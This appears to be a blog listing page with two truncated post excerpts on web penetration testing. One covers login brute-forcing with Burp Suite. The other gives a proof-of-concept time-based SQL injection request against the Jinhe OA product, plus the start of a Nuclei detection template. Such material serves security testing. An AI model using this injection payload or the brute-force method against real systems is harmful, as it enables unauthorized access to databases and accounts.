Guide to Web Penetration Testing: Brute Forcing and SQL Injection
Authentication Vulnerabilities
Exploiting Weak Credentials
The first challenge involves bypassing authentication through brute force techniques. The objective is to identify valid credentials by testing common passwords against a target login interface.
To execute this attack, an interception proxy like Burp Suite is essential. Capture the init ...
Posted on Wed, 17 Jun 2026 17:11:03 +0000 by lucym
Authentication Bypass and SQL Injection in Jinhe OA
Authentication Bypass and SQL Injection
Proof of Concept
GET /C6/JHSoft.Web.WorkFlat/RssModulesHttp.aspx/?interfaceID=1;WAITFOR%20DELAY%20'0:0:3'-- HTTP/1.1
Host: {{Hostname}}
Nuclei Template
id: jinhe-oa-auth-bypass-sqli
info:
name: Jinhe OA Authentication Bypass SQL Injection
author: security-researcher
severity: critical
descriptio ...
Posted on Fri, 08 May 2026 06:44:16 +0000 by Webbyturtle